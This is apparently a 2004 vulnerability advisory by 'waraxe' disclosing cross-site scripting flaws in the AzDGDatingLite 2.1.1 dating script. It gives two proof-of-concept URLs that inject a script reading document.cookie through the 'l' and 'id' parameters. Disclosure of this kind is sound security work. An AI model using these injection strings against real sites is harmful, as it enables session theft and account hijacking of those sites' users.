{================================================================================} { [waraxe-2004-SA#014] } {================================================================================} { } { [ Cross-Site Scripting aka XSS in AzDGDatingLite ] } { } {================================================================================} Author: Janek Vind "waraxe" Date: 07. April 2004 Location: Estonia, Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=14 Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AzDGDatingLite: Version 2.1.1 (probably older versions are affected too) Writed by: AzDG (support@azdg.com) Homepage: http://www.azdg.com Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Cross-Site Scripting in language variable: http://localhost/azdlite/index.php?l=en"><script>alert(document.cookie);</script> 2. Cross-Site Scripting in view.php: http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script> Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused! Special greets to Stefano from UT Bee Clan! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------